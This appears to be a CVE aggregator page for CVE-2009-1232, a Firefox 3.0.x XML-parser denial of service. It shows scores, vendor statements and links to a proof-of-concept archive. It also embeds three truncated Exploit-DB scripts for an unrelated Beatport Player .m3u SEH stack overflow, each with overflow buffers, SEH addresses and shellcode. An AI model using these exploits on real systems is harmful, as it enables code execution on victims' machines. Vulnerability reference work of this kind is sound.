CVE-2009-1232
published 2009-04-02CVE-2009-1232: Mozilla Firefox 3.0.8 and earlier 3.0.x versions allows remote attackers to cause a denial of service (memory corruption) via an XML document composed of a…
PriorityP421medium4.3CVSS 2.0
AVNACMAuNCNINAP
EXPLOIT
EPSS
5.47%
91.8th percentile
Mozilla Firefox 3.0.8 and earlier 3.0.x versions allows remote attackers to cause a denial of service (memory corruption) via an XML document composed of a long series of start-tags with no corresponding end-tags. NOTE: it was later reported that 3.0.10 and earlier are also affected.
Affected
11 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | internet_explorer | — | — |
| microsoft | internet_explorer | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
CVSS provenance
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:N/I:N/A:P
vendor_redhat4.3MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Red Hat
CVE-2009-1232: Mozilla Firefox 3
vendor_redhat·CVSS 4.3
CVE-2009-1232 [MEDIUM] CVE-2009-1232: Mozilla Firefox 3
Mozilla Firefox 3.0.8 and earlier 3.0.x versions allows remote attackers to cause a denial of service (memory corruption) via an XML document composed of a long series of start-tags with no corresponding end-tags. NOTE: it was later reported that 3.0.10 and earlier are also affected.
Statement: https://bugzilla.mozilla.org/show_bug.cgi?id=485941
Red Hat does not consider a user-assisted crash of a client application such as Firefox to be a security issue.
GHSA
GHSA-rrwf-mrcc-mrgc: Mozilla Firefox 3
ghsa_unreviewed·2022-05-02
CVE-2009-1232 [MEDIUM] CWE-20 GHSA-rrwf-mrcc-mrgc: Mozilla Firefox 3
Mozilla Firefox 3.0.8 and earlier 3.0.x versions allows remote attackers to cause a denial of service (memory corruption) via an XML document composed of a long series of start-tags with no corresponding end-tags. NOTE: it was later reported that 3.0.10 and earlier are also affected.
GHSA
GHSA-69rh-9hxh-3h4x: Microsoft Internet Explorer 6 through 6
ghsa_unreviewed·2022-05-02·CVSS 4.3
CVE-2009-2668 [MEDIUM] GHSA-69rh-9hxh-3h4x: Microsoft Internet Explorer 6 through 6
Microsoft Internet Explorer 6 through 6.0.2900.2180 and 7 through 7.0.6000.16473 allows remote attackers to cause a denial of service (CPU consumption) via an XML document composed of a long series of start-tags with no corresponding end-tags, a related issue to CVE-2009-1232.
No detection rules found.
Exploit-DB
Beatport Player 1.0.0.283 - '.m3u' Local Stack Overflow (3)
exploitdb·2009-05-01
CVE-2009-4756 Beatport Player 1.0.0.283 - '.m3u' Local Stack Overflow (3)
Beatport Player 1.0.0.283 - '.m3u' Local Stack Overflow (3)
---
#!/usr/bin/perl
# Beatport Player 1.0.0.283 (.M3U File) Stack Core Overflow Exploit(SEH)
# Work Only in WIN SP2 FR
# Credit to SirGod The Discover
# Stack The exploiter
# Whalna rire m3a lprogram mati khdeme hta ti chiyeb lpc :d
# After exec the exploit wait some sec for see the cmd executed :d
use strict;
use warnings;
# win32_exec - EXITFUNC=seh CMD=cmd Size=32 Encoder=Stack http://Sysworm.com =>> http://www.milw0rm.com/exploits/8078
my $shellcode =
"\x8B\xEC\x33\xFF\x57".
"\xC6\x45\xFC\x63\xC6\x45".
"\xFD\x6D\xC6\x45\xFE\x64".
"\xC6\x45\xF8\x01\x8D".
"\x45\xFC\x50\xB8\xC7\x93".
"\xBF\x77\xFF\xD0";
my $junk = "\x41" x 1232;
my $next_seh="\xeb\x06\x90\x90";
my $seh = "\x44\x25\xD1\x72"; #
my $nops = "\x90" x 4;
my $nopsled
Exploit-DB
Beatport Player 1.0.0.283 - '.m3u' Local Overwrite (SEH)
exploitdb·2009-05-01
CVE-2009-4756 Beatport Player 1.0.0.283 - '.m3u' Local Overwrite (SEH)
Beatport Player 1.0.0.283 - '.m3u' Local Overwrite (SEH)
---
#usage: exploit.py
# Grab the exploit file into the program
print "**************************************************************************"
print " Beatport Player 1.0.0.283 (.m3u) Seh Overwrite Exploit\n"
print " Refer: http://www.milw0rm.com/exploits/8588\n"
print " Exploit code: His0k4\n"
print " Tested on: Windows XP Pro SP3 (EN)\n"
print " greetz: TO ELITE ALGERIANS,snakespc.com\n"
print "**************************************************************************"
buff = "\x41" * 1232
next_seh = "\xEB\x06\x90\x90"
seh = "\xB8\x15\xD1\x72" #msacm32.drv
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
shellcode = (
"\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe8
Exploit-DB
Beatport Player 1.0.0.283 - '.m3u' Local Stack Overflow (2)
exploitdb·2009-05-01
CVE-2009-4756 Beatport Player 1.0.0.283 - '.m3u' Local Stack Overflow (2)
Beatport Player 1.0.0.283 - '.m3u' Local Stack Overflow (2)
---
#exploit.py
#
# Beatport Player 1.0.0.283 (.M3U File) Local Stack Overflow Exploit
# By: Encrypt3d.M!nd
#
# Tested on : Windows xp sp2
#
chars = "\x41" * 1232
ns = "\xEB\x06\x90\x90"
sh = "\x35\x2F\xD1\x72"
nops = "\x90" * 20
# win32_exec - EXITFUNC=thread CMD=calc.exe Size=351
Encoder=PexAlphaNum http://metasploit.com
shellcode=(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
"\x42\x30\x42\x30\x42\x50\x4b\x48\x45\x44\x4e\x43\x4b\x38\x4e
Exploit-DB
Mozilla Firefox 3.0.x - XML Parser Memory Corruption / Denial of Service (PoC)
exploitdb·2009-03-30
CVE-2009-1232 Mozilla Firefox 3.0.x - XML Parser Memory Corruption / Denial of Service (PoC)
Mozilla Firefox 3.0.x - XML Parser Memory Corruption / Denial of Service (PoC)
---
Firefox memory corruption PoC/DoS in XUL (XML) parser
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/8306.rar (2009-Firefox-XUL-0day-PoC.rar)
# milw0rm.com [2009-03-30]
No writeups or analysis indexed.
http://milw0rm.com/sploits/2009-Firefox-XUL-0day-PoC.rarhttp://websecurity.com.ua/3216/http://www.securityfocus.com/bid/34522https://bugzilla.mozilla.org/show_bug.cgi?id=485941https://exchange.xforce.ibmcloud.com/vulnerabilities/49521https://www.exploit-db.com/exploits/8306http://milw0rm.com/sploits/2009-Firefox-XUL-0day-PoC.rarhttp://websecurity.com.ua/3216/http://www.securityfocus.com/bid/34522https://bugzilla.mozilla.org/show_bug.cgi?id=485941https://exchange.xforce.ibmcloud.com/vulnerabilities/49521https://www.exploit-db.com/exploits/8306
2009-04-02
Published